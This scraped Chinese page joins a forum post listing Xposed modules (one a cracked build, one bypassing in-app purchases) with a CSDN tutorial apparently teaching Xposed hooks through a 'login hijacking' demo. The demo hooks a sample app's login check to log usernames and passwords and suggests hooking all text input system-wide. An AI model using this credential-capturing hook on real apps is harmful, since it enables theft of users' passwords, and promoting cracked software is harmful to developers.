android xposed框架中如何创建模块
扫扫二维码，随身浏览文档
手机或平板扫扫即可继续访问
Android Xposed框架中如何创建模块
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由：
将文档分享至：
分享完整地址
文档地址：
粘贴到BBS或博客
flash地址：
支持嵌入FLASH地址的网站使用
html代码：
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布，请您等待！
3秒自动关闭窗口1 / 294 页
主题 : 43|帖子 : 1780|积分 : 7720
本帖最后由 胖姐无敌 于
18:01 编辑
& & 1月5日更新绿色守护，直接在绿色守护介绍下直接更新，新增加的用日期已经隔开，需要的请自行下载
{:5_111:}Xposed框架很多人都知道也知道其强大性，多的就不用我来说了把，还请各位自己体验，以下的模块均来自网络自己整理编辑，如出现意外，本人概不负责，还请各位小心使用!!！{:5_111:}& &
Xposed框架是一个可以在不需要编辑任何APK文件的情况下实现对安卓系统的美化/优化/修改等功能的一个来自于XDA论坛大神的系统框架，基于它可以制作出许多功能强大的模块，且在功能不冲突的情况下同时运作。（需root权限）
Xposed框架下载
(769.5 KB, 下载次数: 6963)
17:46 上传
点击文件名下载附件
下载积分: 加油 -1
1.插件名称：xposed 手电筒
插件版本：V1.7.6
插件语言：中文
通过长按音量上或长按home键启用手电筒，自我感觉是相当方便，虽然有的ROM已经可以实现 但是本软件只有900+K 很轻巧
(952.11 KB, 下载次数: 828)
17:50 上传
点击文件名下载附件
下载积分: 加油 -1
2.插件名称：xsuite
插件版本：V1.0.1
插件语言：中文
好多人觉得CM系列的ROM好丑，有了这个软件就不一样了，这个软件最属强大了，可以自行更改软件图标和名称，只要有图标素材就可以，小米主题的所有图标都可以，MIUI的图标素材提取教程，随意百度下就可以收到了，有了这个软件就代表着拥有了MIUI的所有主题图标
(338.75 KB, 下载次数: 1446)
17:55 上传
点击文件名下载附件
下载积分: 加油 -1
3.插件名称：绿色守护& && && &
插件版本：V2.5
插件语言：中文
阻止那些对系统全局性能和能耗有不良影响的应用程序消耗您的电池电量，禁止软件自启节省运存，真正的提升运存，提升流畅度，自动关闭后台，像IOS一样，再也不担心电量损失过快，手机出现运存过低的情况！！！强大的神器！！！
(1.31 MB, 下载次数: 3183)
18:01 上传
点击文件名下载附件
下载积分: 加油 -1
4.插件名称：重力工具箱（KK）
插件版本：V3.0.3
插件语言：中文
强大的神器，都懂！！！支持：安卓4.4电池图标美化、状态栏图标美化、时间居中显示、
支持数字电量、全局透明度开启、隐藏SIM卡提示和显示、增加高级电源菜单、
修改快捷下拉栏、简单开启虚拟按键功能、自带按键救星功能、关机菜单加入截屏功能& && && &&&
旧式电视CRT关屏特效、恢复开发者选项、锁屏快速程序启动等等
(3.09 MB, 下载次数: 5670)
18:03 上传
点击文件名下载附件
下载积分: 加油 -1
5.插件名称：高斯模糊界面
插件版本：V1.6
插件语言：中文
使下拉通知栏和近期任务列表高斯模糊处理，也可设置全透明，美化必不可少！！！
(141.33 KB, 下载次数: 1676)
18:05 上传
点击文件名下载附件
下载积分: 加油 -1
6.插件名称：WiFi密码查看器
插件版本：2.0.0
插件语言：中文
很方便的直接查看联接过的WiFi的密码，虽然有些软件已经实现，但是此软件同样的是小巧方便！！！！
(396.68 KB, 下载次数: 1296)
18:07 上传
点击文件名下载附件
下载积分: 加油 -1
7.插件名称：点击状态栏返回顶端
插件版本：V1.1
插件语言：中文
点击状态栏滚动滚动条最顶，有些软件也能有这种效果，但这插件就242k
(242.62 KB, 下载次数: 577)
18:29 上传
点击文件名下载附件
下载积分: 加油 -1
8.插件名称：滑动返回
插件版本：V1.0.1
插件语言：中文
开启全局滑动返回支持，像IOS一样支持全局从左滑向右返回手势，各种软件兼容，测试COLOR OS不兼容此软件，谨慎使用！！！一旦用上，就离不开他了！！！！
(115.73 KB, 下载次数: 1730)
18:34 上传
点击文件名下载附件
下载积分: 加油 -1
9.插件名称：启动管理器捐赠版
插件版本：V1.3.9
插件语言：中文
激活模块 禁止应用自启，比起那些臃肿的自启管理，这个就显得小巧强大了！！！！
(103.78 KB, 下载次数: 996)
18:36 上传
点击文件名下载附件
下载积分: 加油 -1
10.插件名称：多宫格解锁& && &&&
插件版本：V1.2
插件语言：中文
允许使用无锁.滑动.图案3X3.图案4x4,5x5，6x6，PIN，密码，为锁屏模式，相信这个很多人都见识过，但是有的ROM并没有此功能，只有单纯的3X3的,这个模块轻易实现！！！！！
(261.63 KB, 下载次数: 657)
18:39 上传
点击文件名下载附件
下载积分: 加油 -1
11.插件名称：列表动画
插件版本：V1.0.1
插件语言：中文
开启全局列表动画，可以自行设置列表动画，动画样式丰富，和PAC一样可以设置动画的功能一样，这次通过这个模块一样轻松实现！！！
(51.42 KB, 下载次数: 871)
18:41 上传
点击文件名下载附件
下载积分: 加油 -1
12.插件名称：状态栏cpu温度显示
插件版本：V1.2.5
插件语言：中文
在状态栏显示你的设备的cpu温度，可以很好的检测手机的温度，延长手机的硬件寿命，偶尔还可以用来装逼！！！！
(294.84 KB, 下载次数: 738)
18:43 上传
点击文件名下载附件
下载积分: 加油 -1
13.插件名称：隐藏低电量警报
插件版本：V1.0.3
插件语言：中文
当电池低于15%的水平时，会提示电池充电，最烦在游戏时突然就来个电量不足，本模块安装后会隐藏此提示！！！
(17.02 KB, 下载次数: 152)
18:48 上传
点击文件名下载附件
下载积分: 加油 -1
1月5日更新增加
15.插件名称:扁平化变色栏
插件版本：0.52
更新内容：
新增 设置自定义图标文本颜色的功能（仅限专业版）
修复 导航栏样式中“导航栏图标与状态栏背景相同”（仅限专业版）
●注意：做了汉化破解，能够使用所有功能，如果发现不能使用高级版功能的话，检查一下设备有没有 Google Play 市场
试用该模块适用于4.3+，这个插件就不用多介绍了吧，是相当给力的
(604.07 KB, 下载次数: 1584)
16:47 上传
点击文件名下载附件
下载积分: 加油 -1
16.插件名称：xStana
插件版本：1.3.8
亲测可以使用Freedom破解内购。此插件可以更换状态栏通知图标，比如闹钟，WIFI，信号，蓝牙，GPS，如有使用导航栏，也可更换导航栏图标
但需要注意的是需要登录谷歌帐号。
(5.74 MB, 下载次数: 800)
16:59 上传
点击文件名下载附件
下载积分: 加油 -1
17.插件名称：智能数据网络
插件版本：1.2.3
此插件，用了就知道多强大了，可以自行设置关闭屏幕时数据网络的状态，也可以设置亮屏是的数据网络状态，以及可以设置蓝牙，WIFI等各种网络状态，可以自行体验其强大性！！！
(1.4 MB, 下载次数: 1092)
17:12 上传
点击文件名下载附件
下载积分: 加油 -1
18.插件名称：权限大师
插件版本：1.2
各种权限更改，多的就不说了，需要注意的是有些权限与应用密切相关，禁用后可能使应用异常
(49.49 KB, 下载次数: 245)
17:17 上传
点击文件名下载附件
下载积分: 加油 -1
{:5_112:}先搞这些把，模块会一直增加，也会更新的，这些都是自己觉得用的爽的模块，拿出来分享一下{:5_112:}
<p id="rate_6383" onmouseover="showTip(this)" tip="很给力!&加油 + 3
<p id="rate_339" onmouseover="showTip(this)" tip="神马都是浮云&加油 + 2
<p id="rate_061" onmouseover="showTip(this)" tip="赞一个!&加油 + 1
<p id="rate_637" onmouseover="showTip(this)" tip="很给力!&加油 + 2
<p id="rate_601" onmouseover="showTip(this)" tip="&加油 + 1
<p id="rate_457" onmouseover="showTip(this)" tip="很给力!&加油 + 3
<p id="rate_303" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_567" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_717" onmouseover="showTip(this)" tip="感谢分享&加油 + 3
<p id="rate_510" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_668" onmouseover="showTip(this)" tip="赞一个!&加油 + 1
<p id="rate_361" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_528" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_348" onmouseover="showTip(this)" tip="很给力!&加油 + 3
<p id="rate_730" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_247" onmouseover="showTip(this)" tip="&加油 + 1
<p id="rate_089" onmouseover="showTip(this)" tip="感谢分享&加油 + 1
<p id="rate_291" onmouseover="showTip(this)" tip="&加油 + 1
<p id="rate_043" onmouseover="showTip(this)" tip="很给力!&加油 + 1
<p id="rate_307" onmouseover="showTip(this)" tip="&加油 + 1
神马都是浮云
润滑油, 积分 1527, 距离下一级还需 473 积分
润滑油, 积分 1527, 距离下一级还需 473 积分
润滑油, 积分 1527, 距离下一级还需 473 积分
主题 : 0|帖子 : 404|积分 : 1527
---来自一加社区手机客户端
主题 : 43|帖子 : 1780|积分 : 7720
沙发我的了
主题 : 43|帖子 : 1780|积分 : 7720
好吧 我是板凳
柴油, 积分 9171, 距离下一级还需 829 积分
柴油, 积分 9171, 距离下一级还需 829 积分
柴油, 积分 9171, 距离下一级还需 829 积分
主题 : 1|帖子 : 1367|积分 : 9171
谢谢分享....
主题 : 2040|帖子 : 23379|积分 : 129351
确实好& && && &&&
主题 : 43|帖子 : 1780|积分 : 7720
---来自一加社区手机客户端
真快&&抢了我的沙发
主题 : 43|帖子 : 1780|积分 : 7720
谢帮顶& && && && && && && && && && &&&
煤油, 积分 2749, 距离下一级还需 2251 积分
煤油, 积分 2749, 距离下一级还需 2251 积分
煤油, 积分 2749, 距离下一级还需 2251 积分
主题 : 15|帖子 : 823|积分 : 2749
好东西谢谢分享
柴油, 积分 7530, 距离下一级还需 2470 积分
柴油, 积分 7530, 距离下一级还需 2470 积分
柴油, 积分 7530, 距离下一级还需 2470 积分
主题 : 75|帖子 : 1898|积分 : 7530
要查看本帖隐藏内容
1 / 294 页
一加手机1勋章
元旦纪念勋章
我是零点控
零点控勋章 只为感谢而来
在线小达人
社区上线100天纪念勋章
一周年纪念勋章
一加一周年纪念勋章
一加手机2勋章
一加手机X勋章
二周年纪念勋章
一加二周年纪念勋章
圣诞节祝福勋章
马年纪念勋章 马上啥都有
猴年纪念勋章 猴年猴赛雷
一加社区氢OS解答组专属勋章
我是加油GG
祝加油GG男生节快乐
2014世界杯纪念勋章
2014世界杯连续签到32天，给你一个证明自己是疯狂球迷的机会
羊年纪念勋章
猴年特殊勋章
深圳市万普拉斯科技有限公司 版权所有 (Android Hook神器：XPosed入门与登陆劫持演示
发表于 16:39|
作者周圣韬
摘要：Xposed是一款可以在不修改APK的情况下影响程序运行的框架服务，基于Xposed能够制作出许多功能强大的模块，且在功能不冲突的情况下同时运作。在本文中，作者详细介绍了Xposed的操作步骤以及登陆劫持实战演练。
CSDN移动将持续为您优选移动开发的精华内容，共同探讨移动开发的技术热点话题，涵盖移动应用、开发工具、移动游戏及引擎、智能硬件、物联网等方方面面。如果您想投稿、参与内容翻译工作，或寻求近匠报道，请发送邮件至tangxy#csdn.net（请把#改成@）。&
作者简介：周圣韬，百度高级Android开发工程师，博客地址：
前段时间写了一篇关于广告注入的文章，大家都直呼过瘾。但是，真正了解这一方面的同学应该知道，其实还有一个比Cydia Substrate更出名的工具：XPosed。
不是因为Xposed比Cydia Substrate做的多好，而是Xposed是彻底开源的。今天，就向大家简单地介绍一下Xposed，并书写一个简单的登陆劫持Demo，让大家快速地入门学习Xposed。
Xposed框架是一款可以在不修改APK的情况下影响程序运行（修改系统）的框架服务，通过替换/system/bin/app_process程序控制zygote进程，使得app_process在启动过程中会加载XposedBridge.jar这个jar包，从而完成对Zygote进程及其创建的Dalvik虚拟机的劫持。
基于Xposed框架可以制作出许多功能强大的模块，且在功能不冲突的情况下同时运作。此外，Xposed框架中的每一个库还可以单独下载使用，如Per APP Setting（为每个应用设置单独的dpi或修改权限）、Cydia、XPrivacy（防止隐私泄露）、BootManager（开启自启动程序管理应用）对原生Launcher替换图标等应用或功能均基于此框架。
官网地址：
源码地址：
Xposed框架是基于一个Android的本地服务应用XposedInstaller，与一个提供API 的jar文件来完成的。所以，安装使用Xposed框架我们需要完成以下几个步骤：
安装本地服务XposedInstaller
需要安装XposedInstall.apk本地服务应用，我们能够在其官网的framework栏目中找到，下载并安装。地址为：
安装好后进入XposedInstaller应用程序，会出现需要激活框架的界面，如下图所示。这里我们点击“安装/更新”就能完成框架的激活了。部分设备如果不支持直接写入的话，可以选择“安装方式”，修改为在Recovery模式下自动安装即可。
因为安装时会存在需要Root权限，安装后会启动Xposed的app_process，所以安装过程中会存在设备多次重新启动。
TIPS：由于国内的部分ROM对Xposed不兼容，如果安装Xposed不成功的话，强制使用Recovery写入可能会造成设备反复重启而无法正常启动。
下载使用API库
其API库XposedBridgeApi-.jar（version是XposedAPI的版本号，如我们这里是XposedBridgeApi-54.jar）文件，我们能够在Xposed的官方支持xda论坛找到，其地址为：
下载完毕后我们需要将Xposed Library复制到lib目录（注意是lib目录，不是Android提供的libs目录），然后将这个jar包添加到Build
如果直接将jar包放置到了libs目录下，很可能会产生错误：
“IllegalAccessError: Class ref in&pre-verified class resolved to unexpected&
implementation”
估计Xposed作者在其框架内部也引用了BridgeApi，这样操作避免重复引用。
实战，登陆劫持（原理）
之前跟大家也说过使用CydiaSubstrate进行广告注入，很多网友问我，除了简单地注入一个广告，还能做什么吗？
登陆劫持！！！
你没听错，今天我们这里就简单地演示一下，如何对一个应用程序的登陆功能进行劫持，并把账号密码打印出来。
如我们常见的登陆劫持，就是使用了Hook技术来完成的。那么这个登陆劫持是如何完成的呢？下面我们就具体来看看一个在开发中常见到的登陆例子。首先，我们看看一个常见的登陆界面是什么样子的。
其对应的登陆流程代码如下所示：// 登陆按钮的onClick事件
mLoginButton.setOnClickListener(new OnClickListener() {
public void onClick(View v) {
// 获取用户名
String username = mUserEditText.getText() + "";
// 获取密码
String password = mPasswordEditText.getText() + "";
if (isCorrectInfo(username, password)) {
Toast.makeText(MainActivity.this, "登陆成功！", Toast.LENGTH_LONG).show();
Toast.makeText(MainActivity.this, "登陆失败！", Toast.LENGTH_LONG).show();
});我们会发现，登陆界面上面的用户信息都是存储在EditText控件上，然后通过用户手动点击“登陆”按钮才会将上面的信息发送至服务器端，去验证账号与密码是否正确。这样就很简单了，黑客们只需要找到开发者在使用EditText控件的getText方法后进行网络验证的方法，Hook该方法，就能劫持到用户的账户与密码劫了。
TIPS：当然，我们也可以仿照上之前CydiaSubstrate的广告注入例子，做一个一模一样的Activity，在劫持原Activity优先弹出来，达到欺骗用户获取密码的目的。
具体流程如下：
实战，登陆劫持（编码）
明白了原理下面我们就实际的操作一次，这里我们选择使用Xposed框架来操作。使用Xposed进行Hook操作主要就是使用到了Xposed中的两个比较重要的方法，handleLoadPackage获取包加载时候的回调并拿到其对应的classLoader；findAndHookMethod对指定类的方法进行Hook。它们的详细定义如下所示：/**
* 包加载时候的回调
public void handleLoadPackage(final LoadPackageParam lpparam)
* Xposed提供的Hook方法
* @param className 待Hook的Class
* @param classLoader classLoader
* @param methodName 待Hook的Method
* @param parameterTypesAndCallback hook回调
Unhook findAndHookMethod(String className, ClassLoader classLoader, String methodName, Object... parameterTypesAndCallback) 当然，我们使用Xposed进行Hook也分为如下几个步骤：
1. 在AndroidManifest.xml文件中配置插件名称与Api版本号
&application
android:allowBackup="true"
android:icon="@drawable/ic_launcher"
android:label="@string/app_name"
android:theme="@style/AppTheme" &
&meta-data
android:name="xposedmodule"
android:value="true" /&
&!-- 模块描述 --&
&meta-data
android:name="xposeddescription"
android:value="一个登陆劫持的样例" /&
&!-- 最低版本号 --&
&meta-data
android:name="xposedminversion"
android:value="30" /&
&/application&
2. 新建一个入口类并继承并实现IXposedHookLoadPackage接口
如下操作，我们新建了一个com.example.loginhook.Main的类，并实现IXposedHookLoadPackage接口中的handleLoadPackage方法，将非com.example.login包名的应用过滤掉，即我们只操作包名为com.example.login的应用。如下所示：public class Main implements IXposedHookLoadPackage {
* 包加载时候的回调
public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
// 将包名不是 com.example.login 的应用剔除掉
if (!lpparam.packageName.equals("com.example.login"))
XposedBridge.log("Loaded app: " + lpparam.packageName);
}3. 声明主入口路径
需要在assets文件夹中新建一个xposed_init的文件，并在其中声明主入口类。如这里我们的主入口类为com.example.loginhook.Main。
4. 使用findAndHookMethod方法Hook劫持登陆信息
这是最重要的一步，我们之前所分析的都需要到这一步进行操作。如我们之前所分析的登陆程序，我们需要劫持，就是需要Hook其com.example.login.MainActivity中的isCorrectInfo方法。我们使用Xposed提供的findAndHookMethod直接进行MethodHook操作（与Cydia很类似）。在其Hook回调中使用XposedBridge.log方法，将登陆的账号密码信息打印至Xposed的日志中。具体操作如下所示：import static de.robv.android.xposed.XposedHelpers.findAndHookM
public class Main implements IXposedHookLoadPackage {
* 包加载时候的回调
public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {
// 将包名不是 com.example.login 的应用剔除掉
if (!lpparam.packageName.equals("com.example.login"))
XposedBridge.log("Loaded app: " + lpparam.packageName);
// Hook MainActivity中的isCorrectInfo(String,String)方法
findAndHookMethod("com.example.login.MainActivity", lpparam.classLoader, "isCorrectInfo", String.class,
String.class, new XC_MethodHook() {
protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
XposedBridge.log("开始劫持了~");
XposedBridge.log("参数1 = " + param.args[0]);
XposedBridge.log("参数2 = " + param.args[1]);
protected void afterHookedMethod(MethodHookParam param) throws Throwable {
XposedBridge.log("劫持结束了~");
XposedBridge.log("参数1 = " + param.args[0]);
XposedBridge.log("参数2 = " + param.args[1]);
}5. 在XposedInstaller中启动我们自定义的模块
编译后安装在Android设备上的模块应用程序不会立即的生效，我们需要在XpasedInstaller模块选项中勾选待启用的模块才能让其正常的生效。如：
6. 重启验证
重启Android设备，进入XposedInstaller查看日志模块，因为我们之前使用的是XposedBridge.log方法打印log，所以log都会显示在此处。我们发现我们需要劫持的账号密码都显示再来此处。
TIPS：这里我们是通过逆向分析该登陆页面的登录判断调用函数来完成Hook与劫持工作的。有些读者应该想出来了，我们能不能直接Hook系统中提供给我们的控件EditText（输入框控件）中的getText()方法进行Hook呢？这样我们就能够对系统中所有的输入进行监控劫持了。这里留给大家一个思考，感兴趣的读者可以尝试一下。
将于10月15-16日在北京新云南皇冠假日酒店召开。大会特设五大技术专场：平台与技术iOS、平台与技术Android、产品与设计、游戏开发、企业移动化。此外，大会更是首次举办国内极具权威影响力的IoT技术峰会，特设硬件开发技术与虚拟现实两大专场。大会将聚集国内最具实力的产品技术团队，与开发者一道进行最前沿的探讨与交流。
第一时间掌握最新移动开发相关信息和技术，请关注mobilehub公众微信号（ID: mobilehub)。&
推荐阅读相关主题：
CSDN官方微信
扫描二维码,向CSDN吐槽
微信号：CSDNnews
相关热门文章}